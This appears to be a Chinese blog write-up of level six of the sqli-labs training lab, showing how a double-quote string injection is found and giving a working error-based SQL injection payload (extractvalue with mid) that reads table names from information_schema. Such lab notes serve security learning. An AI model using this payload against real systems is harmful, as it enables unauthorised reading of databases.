sqllab第六关通关笔记

知识点:

  • 报错注入回顾
  • 原始语句测试
  • 截取函数
    • mid(字符串,起始位置,长度)
    • substr(字符串,起始位置,长度)
    • left(字符串,长度)
    • right(字符串,长度)
  • 加入截取控制的错误注入payload
    • payload:id=1"%20and%20extractvalue(1,concat(0x7e,mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,30),0x7e))+--+
  • 关键表信息回顾

首先判断注入类型

构造id=1/0

发现正常输出;应该是字符型注入

构造id=1'

发现正常输出;不是单引号的输入读取

构造id=1"

发现报错了;好了,双引号引起的注入

利用错误注入进行数据读取

构造payload:id=1"%20and%20extractvalue(1,concat(0x7e,mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,30),0x7e))+--+

成功读取到了数据库的表信息;进一步可以读取字段名和关键信息

这里采用了mid截取函数进行长度控制;由于读取的内容小于32位,所以直接全部输出了;要不然就得分段读取

10

相关推荐
liuyicenysabel26 分钟前
大模型学习笔记 · 第八篇 · 进阶:偏好对齐与多卡训练
人工智能·笔记·学习
番茄育学园4 小时前
我的三款主流云存储音乐库实测笔记
笔记·分类·媒体
十月的皮皮7 小时前
C语言学习笔记20260706-栈的压入、弹出序列验证
c语言·笔记·学习
维他奶糖618 小时前
基于 DrissionPage 实现小红书搜索笔记批量采集
笔记
hssfscv9 小时前
QT的学习笔记4——QMainWindow、资源文件以及主要控件的介绍
笔记·qt·学习
克里斯蒂亚诺更新9 小时前
电脑关闭密码的操作
笔记
小小的代码里面挖呀挖呀挖9 小时前
杰理蓝牙耳机开发--LE Audio与游戏耳机应用
笔记·单片机·物联网·学习
xiaomici10 小时前
SAC中的Dataset/Model/Planning model
笔记
学数学的口心贝10 小时前
从零搭建并维护个人主页
经验分享·笔记
一个人旅程~11 小时前
欧文·亚隆的《当尼采哭泣》(When Nietzsche Wept)精简总结
经验分享·笔记·新浪微博